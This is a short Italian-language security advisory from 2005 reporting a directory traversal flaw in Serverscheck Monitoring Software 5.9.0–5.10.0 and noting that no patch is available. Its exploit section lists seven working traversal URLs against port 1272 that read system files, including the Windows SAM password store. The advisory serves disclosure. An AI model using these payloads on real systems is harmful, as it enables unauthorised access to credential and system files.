*******************************************
Serverscheck trasversal url bug

by rgod at http://rgod.altervista.org

26-05-2005
******************************************


-sito del produttore:

www.serverscheck.com


-versione testata:

Serverscheck Monitoring Software 5.9.0 - 5.10.0


-descrizione del prodotto:

"ServersCheck is a network monitoring, reporting and alerting tool.
It monitors the availability of networked devices and computer systems
(Windows, Unix, Linux, MacOS,...). ServersCheck runs on Windows 2000, 2003 and
XP"


-vulnerabilità:

directory trasversal bug - permette a un utente definito dall'amministratore
di navigare all'interno della macchina e procurarsi file di password,
informazioni riservate. Al momento non è disponibile alcuna patch.


-exploit:

alcuni check con esito positivo:

http://localhost:1272/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
http://localhost:1272/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../boot.ini
http://localhost:1272/..%2F..%2F..%2F..%2F..%2F../windows/repair/sam
http://localhost:1272/.../.../.../.../.../.../.../.../.../boot.ini
http://localhost:1272/../../../../../../../../../boot.ini
http://localhost:1272/../../../../../../../../boot.ini
http://localhost:1272/../../../../boot.ini